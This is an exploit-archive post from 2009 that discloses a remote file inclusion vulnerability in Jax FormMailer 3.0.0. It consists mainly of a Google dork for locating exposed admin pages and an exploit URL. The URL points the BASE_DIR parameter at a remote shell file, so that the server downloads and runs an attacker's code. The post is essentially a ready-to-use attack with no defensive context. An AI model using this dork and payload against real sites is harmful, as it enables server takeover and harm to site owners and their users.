[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Jax FormMailer 3.0.0 Remote File Inclusion Vulnerability
# Published : 2009-06-30
# Author : ahmadbady
# Previous Title : BIGACE CMS 2.6 (cmd) Local File Inclusion Vulnerability
# Next Title : phpMyBlockchecker 1.0.0055 Insecure Cookie Handling Vulnerability
--:remote file include:--
---------------------------------
script:Jax FormMailer 3.0.0
Release:01.06.2008
-
Author: ahmadbady
-----------------------------------------------------------------------
download from:http://www.jtr.de/scripting/php/formmailer/index_eng.html
-----------------------------------------------------------------------
dork:intitle:"Jax Formmailer - Administration"
-------------------------------------------
-------------------------------------------
xpl:
/path/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=http://site.com/shell.txt?
*******************************************
# www.Syue.com [2009-06-30]